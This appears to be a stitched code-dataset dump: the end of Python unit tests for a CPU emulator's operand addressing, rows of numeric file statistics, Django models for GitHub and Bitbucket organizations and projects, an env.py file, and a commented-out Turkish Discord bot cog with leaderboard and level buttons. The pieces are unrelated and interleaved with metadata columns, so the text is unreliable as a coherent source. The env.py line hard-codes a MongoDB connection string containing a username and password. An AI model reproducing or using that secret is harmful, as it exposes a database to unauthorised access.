        self._set(Operand(OpLen.WORD, OpType.REGISTER, 'AX', 1, None, None), 0x3344)
        set_register = self.cpu.registers.set_register
        self.assertEqual(set_register.call_count, 1)
        self.assertEqual(set_register.call_args_list[0][0][0], 'AX')
        self.assertEqual(set_register.call_args_list[0][0][1], 0x3344)
        self._assert_access()

    def test_abs_ref_reg_b(self):
        # Byte write at register value + offset: 0xA0B0 + 0x01.
        self._set(Operand(OpLen.BYTE, OpType.ABS_REF_REG, 'AX', None, None, 0x01), 0x33)
        self._assert_access(reg_read='AX', byte_write=(0xA0B1, 0x33))

    def test_abs_ref_reg_w(self):
        self._set(Operand(OpLen.WORD, OpType.ABS_REF_REG, 'AX', None, None, 0x01), 0x3344)
        self._assert_access(reg_read='AX', word_write=(0xA0B1, 0x3344))

    def test_rel_ref_word(self):
        # IP-relative write: 0x1234 - 0x1111 = 0x0123.
        self._set(Operand(OpLen.BYTE, OpType.REL_REF_WORD, None, None, -0x1111, None), 0x33)
        self._assert_access(byte_write=(0x0123, 0x33))

    def test_rel_ref_word_byte(self):
        # IP-relative with extra byte offset: 0x0123 + 0x22 = 0x0145.
        self._set(Operand(OpLen.BYTE, OpType.REL_REF_WORD_BYTE, None, None, -0x1111, 0x22), 0x33)
        self._assert_access(byte_write=(0x0145, 0x33))

    def test_rel_ref_word_reg(self):
        # IP-relative plus register value: 0x0123 + 0xA0B0 = 0xA1D3.
        self._set(Operand(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'AX', None, -0x1111, None), 0x33)
        self._assert_access(reg_read='AX', byte_write=(0xA1D3, 0x33))
class TestGetReferenceAddress(unittest.TestCase):
    """Tests for _get_reference_address() at instruction pointer 0x1234."""

    def setUp(self):
        self.cpu = Mock()

    def _addr(self, operand):
        """Resolve *operand* to an absolute address."""
        return _get_reference_address(operand, self.cpu, 0x1234)

    def test_abs_ref_reg(self):
        # Register value plus signed offset.
        self.cpu.registers.get_register.return_value = 0xA0B0
        for opoffset, expected in ((0x01, 0xA0B1), (-0x01, 0xA0AF)):
            self.assertEqual(
                self._addr(Operand(OpLen.BYTE, OpType.ABS_REF_REG, 'AX', None, None, opoffset)),
                expected,
            )

    def test_rel_ref_word(self):
        # Instruction pointer plus signed base.
        for opbase, expected in ((0x1111, 0x2345), (-0x1111, 0x0123)):
            self.assertEqual(
                self._addr(Operand(OpLen.BYTE, OpType.REL_REF_WORD, None, None, opbase, None)),
                expected,
            )

    def test_rel_ref_word_byte(self):
        # Instruction pointer plus signed base plus byte offset.
        for opbase, expected in ((0x1111, 0x2367), (-0x1111, 0x0145)):
            self.assertEqual(
                self._addr(Operand(OpLen.BYTE, OpType.REL_REF_WORD_BYTE, None, None, opbase, 0x22)),
                expected,
            )

    def test_rel_ref_word_reg(self):
        # Instruction pointer plus signed base plus register value.
        self.cpu.registers.get_register.return_value = 0xA0B0
        for opbase, expected in ((0x1111, 0xC3F5), (-0x1111, 0xA1D3)):
            self.assertEqual(
                self._addr(Operand(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'AX', None, opbase, None)),
                expected,
            )
class TestGetOpbyte(unittest.TestCase):
    """Tests for _get_opbyte() encoding length/type/register into one byte."""

    def test(self):
        # ((args...), expected byte); the register argument defaults to 'AX'.
        cases = (
            ((OpLen.BYTE, OpType.VALUE), 0x00),
            ((OpLen.WORD, OpType.VALUE), 0x80),
            ((OpLen.BYTE, OpType.VALUE, 'AX'), 0x00),
            ((OpLen.WORD, OpType.VALUE, 'AX'), 0x80),
            ((OpLen.BYTE, OpType.VALUE, 'BX'), 0x01),
            ((OpLen.WORD, OpType.VALUE, 'BX'), 0x81),
            ((OpLen.BYTE, OpType.EXTENDED), 0x70),
            ((OpLen.WORD, OpType.EXTENDED), 0xF0),
            ((OpLen.BYTE, OpType.EXTENDED, 'AX'), 0x70),
            ((OpLen.WORD, OpType.EXTENDED, 'AX'), 0xF0),
            ((OpLen.BYTE, OpType.EXTENDED, 'BX'), 0x71),
            ((OpLen.WORD, OpType.EXTENDED, 'BX'), 0xF1),
        )
        for args, expected in cases:
            self.assertEqual(_get_opbyte(*args), expected)
class TestRegisters(unittest.TestCase):
    """Tests for the register name <-> code lookup helpers."""

    def test_get_register_code_by_name(self):
        for name, code in (('AX', 0), ('AL', 8), ('AH', 9)):
            self.assertEqual(_get_register_code_by_name(name), code)
        with self.assertRaises(InvalidRegisterNameError):
            _get_register_code_by_name('XX')

    def test_get_register_name_by_code(self):
        for code, name in ((0, 'AX'), (8, 'AL'), (9, 'AH')):
            self.assertEqual(_get_register_name_by_code(code), name)
        # Codes outside the valid range must be rejected.
        for bad_code in (-1, 16):
            with self.assertRaises(InvalidRegisterCodeError):
                _get_register_name_by_code(bad_code)
| 44.315972
| 114
| 0.653882
| 3,137
| 25,526
| 5.090214
| 0.043354
| 0.149361
| 0.079722
| 0.059243
| 0.905937
| 0.880699
| 0.867172
| 0.831851
| 0.784632
| 0.702781
| 0
| 0.042487
| 0.226397
| 25,526
| 575
| 115
| 44.393043
| 0.766142
| 0
| 0
| 0.682171
| 0
| 0
| 0.005876
| 0
| 0
| 0
| 0.033378
| 0
| 0.449612
| 1
| 0.071705
| false
| 0
| 0.00969
| 0
| 0.094961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dccfcf5fe340584cacae04463285d5b6a560f3d3
| 4,369
|
py
|
Python
|
readthedocs/oauth/models.py
|
adrianmugnoz/Documentacion-universidades
|
0e088718cdfdb2c9c52118c181def8086c821b1e
|
[
"MIT"
] | 1
|
2019-05-07T15:08:53.000Z
|
2019-05-07T15:08:53.000Z
|
readthedocs/oauth/models.py
|
mba811/readthedocs.org
|
b882cec8c0e7d741d3c58af2f6d0f48d1a123f8d
|
[
"MIT"
] | null | null | null |
readthedocs/oauth/models.py
|
mba811/readthedocs.org
|
b882cec8c0e7d741d3c58af2f6d0f48d1a123f8d
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
class GithubOrganization(models.Model):
    """A GitHub organization mirrored locally and linked to site users."""

    # Auto fields -- timestamps maintained automatically by Django.
    pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
    modified_date = models.DateTimeField(_('Modified date'), auto_now=True)

    # Site users associated with this organization.
    users = models.ManyToManyField(User, verbose_name=_('Users'),
                                   related_name='github_organizations')
    # GitHub login is the unique identifier for an organization.
    login = models.CharField(_('Login'), max_length=255, unique=True)
    email = models.EmailField(_('Email'), max_length=255, null=True, blank=True)
    name = models.CharField(_('Name'), max_length=255, null=True, blank=True)
    html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
    active = models.BooleanField(_('Active'), default=False)
    # Raw API response payload stored verbatim.
    json = models.TextField('JSON')

    def __unicode__(self):
        # NOTE(review): Python 2-style text method; on Python 3 Django uses
        # __str__ instead -- confirm target Python version before porting.
        return "GitHub Organization: %s" % (self.html_url)
class GithubProject(models.Model):
    """A GitHub repository mirrored locally, optionally under an organization."""

    # Auto fields -- timestamps maintained automatically by Django.
    pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
    modified_date = models.DateTimeField(_('Modified date'), auto_now=True)

    # Site users associated with this repository.
    users = models.ManyToManyField(User, verbose_name=_('Users'),
                                   related_name='github_projects')
    # Owning organization; null for repositories under a personal account.
    organization = models.ForeignKey(GithubOrganization, verbose_name=_('Organization'),
                                     related_name='projects', null=True, blank=True)
    name = models.CharField(_('Name'), max_length=255)
    # "owner/repo" -- unique across GitHub, so unique here as well.
    full_name = models.CharField(_('Full Name'), max_length=255, unique=True)
    description = models.TextField(_('Description'), blank=True, null=True,
                                   help_text=_('The reStructuredText description of the project'))
    git_url = models.CharField(_('Git URL'), max_length=200, blank=True)
    ssh_url = models.CharField(_('SSH URL'), max_length=200, blank=True)
    html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
    active = models.BooleanField(_('Active'), default=False)
    # Raw API response payload stored verbatim.
    json = models.TextField('JSON')

    def __unicode__(self):
        # NOTE(review): Python 2-style text method; on Python 3 Django uses __str__.
        return "GitHub Project: %s" % (self.html_url)
class BitbucketTeam(models.Model):
    """A Bitbucket team mirrored locally and linked to site users."""

    # Auto fields -- timestamps maintained automatically by Django.
    pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
    modified_date = models.DateTimeField(_('Modified date'), auto_now=True)

    # Site users associated with this team.
    users = models.ManyToManyField(User, verbose_name=_('Users'),
                                   related_name='bitbucket_organizations')
    # Bitbucket login is the unique identifier for a team.
    login = models.CharField(_('Login'), max_length=255, unique=True)
    email = models.EmailField(_('Email'), max_length=255, null=True, blank=True)
    name = models.CharField(_('Name'), max_length=255, null=True, blank=True)
    html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
    active = models.BooleanField(_('Active'), default=False)
    # Raw API response payload stored verbatim.
    json = models.TextField('JSON')

    def __unicode__(self):
        # NOTE(review): Python 2-style text method; on Python 3 Django uses __str__.
        return "Bitbucket Team: %s" % (self.html_url)
class BitbucketProject(models.Model):
    """A Bitbucket repository mirrored locally, optionally under a team."""

    # Auto fields -- timestamps maintained automatically by Django.
    pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
    modified_date = models.DateTimeField(_('Modified date'), auto_now=True)

    # Site users associated with this repository.
    users = models.ManyToManyField(User, verbose_name=_('Users'),
                                   related_name='bitbucket_projects')
    # Owning team; null for repositories under a personal account.
    organization = models.ForeignKey(BitbucketTeam, verbose_name=_('Organization'),
                                     related_name='projects', null=True, blank=True)
    name = models.CharField(_('Name'), max_length=255)
    # "owner/repo" -- unique across Bitbucket, so unique here as well.
    full_name = models.CharField(_('Full Name'), max_length=255, unique=True)
    description = models.TextField(_('Description'), blank=True, null=True,
                                   help_text=_('The reStructuredText description of the project'))
    # Version control system of the repository (Bitbucket hosted git and hg).
    vcs = models.CharField(_('vcs'), max_length=200, blank=True)
    git_url = models.CharField(_('Git URL'), max_length=200, blank=True)
    ssh_url = models.CharField(_('SSH URL'), max_length=200, blank=True)
    html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
    active = models.BooleanField(_('Active'), default=False)
    # Raw API response payload stored verbatim.
    json = models.TextField('JSON')

    def __unicode__(self):
        # NOTE(review): Python 2-style text method; on Python 3 Django uses __str__.
        return "Bitbucket Project: %s" % (self.html_url)
| 46.978495
| 98
| 0.673838
| 507
| 4,369
| 5.550296
| 0.151874
| 0.060768
| 0.042644
| 0.060412
| 0.889126
| 0.8543
| 0.8543
| 0.8543
| 0.8543
| 0.8543
| 0
| 0.016166
| 0.19295
| 4,369
| 92
| 99
| 47.48913
| 0.781906
| 0.010758
| 0
| 0.727273
| 0
| 0
| 0.140144
| 0.005328
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.045455
| 0.060606
| 0.878788
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
0d44e5e6d9f36901e93c880a5e517173d618c59a
| 159
|
py
|
Python
|
env.py
|
Code-Institute-Submissions/Lordph8-Project3
|
fdefe7ffb7c53e8cb2d70b8c760e4efd27bb4517
|
[
"MIT"
] | null | null | null |
env.py
|
Code-Institute-Submissions/Lordph8-Project3
|
fdefe7ffb7c53e8cb2d70b8c760e4efd27bb4517
|
[
"MIT"
] | null | null | null |
env.py
|
Code-Institute-Submissions/Lordph8-Project3
|
fdefe7ffb7c53e8cb2d70b8c760e4efd27bb4517
|
[
"MIT"
] | null | null | null |
import os

# Supply a default MongoDB connection string when MONGO_URI is not already set
# in the environment (setdefault keeps any externally provided value).
# NOTE(review): database credentials are hard-coded in source control here --
# rotate this password and load the URI from an untracked env file or secret
# store instead of committing it.
os.environ.setdefault("MONGO_URI", "mongodb+srv://root:Thisisarandompassword@myfirstcluster-qpzww.mongodb.net/theRecipe?retryWrites=true&w=majority")
| 79.5
| 149
| 0.836478
| 20
| 159
| 6.6
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018868
| 159
| 2
| 149
| 79.5
| 0.846154
| 0
| 0
| 0
| 0
| 0.5
| 0.75
| 0.69375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 8
|
0d51a39dc3763222336d58785130ec15857fbfe1
| 34,938
|
py
|
Python
|
cogs/information.py
|
BioKZM/Colonist
|
ab3872c01b1bdc235e80065530fbed9953952919
|
[
"MIT"
] | 5
|
2021-11-20T12:30:55.000Z
|
2022-02-02T15:34:23.000Z
|
cogs/information.py
|
BioKZM/Colonist
|
ab3872c01b1bdc235e80065530fbed9953952919
|
[
"MIT"
] | null | null | null |
cogs/information.py
|
BioKZM/Colonist
|
ab3872c01b1bdc235e80065530fbed9953952919
|
[
"MIT"
] | null | null | null |
# import discord
# import asyncio
# import json
# from discord.ext import commands
# from discord.utils import get
# # from cogs.personalPoint import PersonalPoint
# from main import client
# from discord_ui import UI,Button
# from functions.userClass import User,experiences,levelNames
# from cogs.rank import getSortedMembers
# ui = UI(client)
# class Information(commands.Cog):
# def __init__(self,client):
# self.client = client
# @commands.command()
# async def bilgi(self,ctx):
# embed = discord.Embed(title="Üye Bilgi Ekranı",description="Üye bilgi ekranına hoş geldin.\nAşağıdaki butonlara basarak\nbilgisini almak istediğin içeriği görebilirsin.",color = 0x8d42f5,)
# embed.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)
# message = await ctx.channel.send(
# embed=embed,
# components = [
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# ),
# ]
# )
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# info[ctx.author.id] = message.id
# with open("files/infoMessage.json","w") as file:
# json.dump(info,file,indent=4)
# @ui.components.listening_component('seviye')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# member = component.author
# user = User(member.id)
# if not member.bot:
# embed = discord.Embed(title=f"{member.name}#{member.discriminator} adlı kullanıcının değerleri",description="",color=0x8d42f5)
# embed.add_field(name="Mevcut değerler - 🏆 ",value="Seviyesi = **{}**\n Puanı = **{}**\n Rütbesi = **{}**\n".format(user.level,user.XP,user.levelName,inline=False))
# if user.isMaxLevel():
# embed.add_field(name="Bir sonraki rütbe - 🚀 ",value=f"**Maksimum seviyeye ulaştınız!**",inline=False)
# elif not user.isMaxLevel():
# if experiences[user.level] - user.XP <= 0:
# embed.add_field(name="Bir sonraki rütbe - 🚀 ",value=f"**{levelNames[user.getLevel(user.XP)]}** rütbesine ulaştın! Seviye atlamak için ses kanalına girebilirsin.",inline=False)
# else:
# embed.add_field(name="Bir sonraki rütbe - 🚀 ",value=f"**{levelNames[user.level]}** rütbesi için kalan puan = **{(experiences[user.level-2])-user.XP}**",inline=False)
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=embed,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# return
# try:
# await component.respond()
# except:
# pass
# @ui.components.listening_component('liderliktablosu')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# sortedMembers = getSortedMembers(component)
# embed=discord.Embed(title="Sıralama",inline=False,color=0x8d42f5)
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# count = 1
# for key,value in sortedMembers.items():
# embed.add_field(name="{} - {}".format(count,key),value="**Puan**: {}\n**Rütbe**: {}".format(value[0],value[1]),inline=False)
# count += 1
# if count == 11:break
# await component.message.edit(embed=embed,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('detaylıbilgi')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# liste = {}
# XP = {}
# for i in range(1,11):
# liste[f'level{i}'] = 0
# XP[f'xp{i}'] = ""
# if i == 1:
# XP[f"xp{i}"] += f"{levelNames[i-1]}"
# else:
# XP[f'xp{i}'] += f"{levelNames[i-1]} - {experiences[i-2]}"
# try:
# await component.respond()
# except:
# pass
# for member in client.get_all_members():
# if not member.bot:
# user = User(member.id)
# liste[f'level{user.level}'] += 1
# message = discord.Embed(title = "Detaylı Bilgi",description="**Aşağıda, hangi seviyede kaç kullanıcının bulunduğunu öğrenebilirsin**",color = 0x8d42f5)
# for level in range(1,11):
# XPs = XP[f'xp{level}']
# levels = liste[f'level{level}']
# if levels == 0:
# if XP[f'xp{level}'] == "Guest":
# message.add_field(name=f"*Seviye {level}* / {XPs}:",value=f"Bu seviyede herhangi biri yok.",inline=False)
# else:
# message.add_field(name=f"*Seviye {level}* / {XPs} XP:",value=f"Bu seviyede herhangi biri yok.",inline=False)
# else:
# if XP[f'xp{level}'] == "Guest":
# message.add_field(name=f"*Seviye {level}* / {XPs}:",value=f"**{levels}** kişi bu seviyede.",inline=False)
# else:
# message.add_field(name=f"*Seviye {level}* / {XPs} XP:",value=f"**{levels}** kişi bu seviyede.",inline=False)
# message.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=message,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('görevler')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# embed = discord.Embed(
# title = "Görevler",
# description = "**Bir gemiye atla ve bir oyun üret**;\nPC/Platform .............................. 10.0000 XP\nMobil ............................................... 5.000 XP\nHyperCasual................................... 2.000 XP\nGameJam.......................................... 1.000XP\n*Oyun yayınlanırsa kazanılan deneyim puanı iki katına çıkar*",
# color = 0x8d42f5
# )
# embed.add_field(
# name = "\n\nSunucu Takviyesi",
# value = "Her sunucu takviyesi başına **250 XP**",
# inline=False
# )
# embed.add_field(
# name = "\n\nSes Kanallarına Aktif Ol",
# value = "Dakika başına 1 XP\n*Not: Kazanılan XP, yayın ve kamera açma durumuna göre değişiklik gösterir.*",
# inline=False
# )
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=embed,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('seviyeler')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# embed = discord.Embed(
# title = "Seviyeler",
# description = "Aşağıda, sunucuda bulunan mevcut seviyeleri görebilirsin.",
# color = 0x8d42f5
# )
# embed.add_field(
# name = "Guest:",
# value = "Misafir statüsünde üye",
# inline = False,
# )
# embed.add_field(
# name = "Colony Member / 250 XP:",
# value = "Koloni üyesi",
# inline = False,
# )
# embed.add_field(
# name = "Open Crew / 1.987 XP:",
# value = "Açık gemilerde mürettebat olma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Crew / 6.666 XP:",
# value = "Bütün gemilerde mürettebat olma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Captain / 9.999 XP:",
# value = "Gemilere kaptanlık yapma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Judge / 30.000 XP:",
# value = "Oy kullanma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Colony Manager / 90.000 XP:",
# value = "Tasarlanacak oyunlara karar veren üye",
# inline = False,
# )
# embed.add_field(
# name = "Mars Lover / 300.000 XP:",
# value = "Yayınlanan bütün oyunlarda adına teşekkür edilen üye",
# inline = False,
# )
# embed.add_field(
# name = "Chief of the Colony / 900.000 XP:",
# value = "Kolonideki kamu yönetiminde, herhangi bir rolü alabilen üye, A.K.A Chief",
# inline = False,
# )
# embed.add_field(
# name = "Partner / 10.000.001 XP:",
# value = "Koloninin fahri ortağı",
# inline = False,
# )
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=embed,components = [
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('geri')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
